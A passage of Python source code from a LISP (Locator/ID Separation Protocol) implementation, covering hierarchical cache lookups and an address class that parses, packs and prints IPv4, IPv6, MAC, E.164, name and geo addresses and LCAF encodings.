entry = entries[entry_key]
if (entry == None): continue
if (prefix.is_more_specific(entry.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (self.cache.has_key(ml) == False): return
if (self.cache[ml].entries.has_key(key) == False): return
self.cache[ml].entries.pop(key)
self.cache[ml].entries_sorted.remove(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries_sorted:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
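#
# A minimal usage sketch with hypothetical addresses (both arguments are
# lisp_address() instances, defined later in this file):
#
#   s = lisp_address(LISP_AFI_IPV4, "10.1.1.1", 32, 0)
#   d = lisp_address(LISP_AFI_IPV4, "10.2.2.2", 32, 0)
#   mc = lisp_map_cache_lookup(s, d)
#
# For a multicast destination the same call does the two-stage (S,G)
# lookup: first on the group, then on the source within the group entry.
#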
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
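#
# For example, a longest-match lookup for ([0]1.1.1.1/32, [0]224.1.1.1/32)
# first matches group 224.1.1.1 in the referral-cache and then looks up
# source 1.1.1.1 within that entry's source cache; if the source is not
# found, the group entry itself is returned.
#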
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be returned if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more-specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is returned is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the returned entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 entry matches the
# group we are looking up. This, of course, is only done for longest-match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python peculiarity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
            # Sigh, we have a high-order-byte zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
            # Allow user to specify ff::/8 which allows for placing the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
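    #
    # For example, store_prefix("[7]10.0.0.0/8") stores AFI IPv4,
    # instance-id 7, address 10.0.0.0, and mask_len 8. A quoted
    # distinguished-name such as "'webserver'" gets a mask-length of
    # 8 bits per character.
    #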
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
            #endif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
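    #
    # For example, with self [1]10.1.1.1/32 and g [1]224.1.1.1/32,
    # print_sg() returns "[1](10.1.1.1/32, 224.1.1.1/32)".
    #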
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
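    #
    # For example, [0]10.1.1.0/24 is more-specific than [0]10.0.0.0/8
    # since the high-order 8 bits match, but [1]10.1.1.0/24 is not, since
    # the instance-IDs differ.
    #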
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
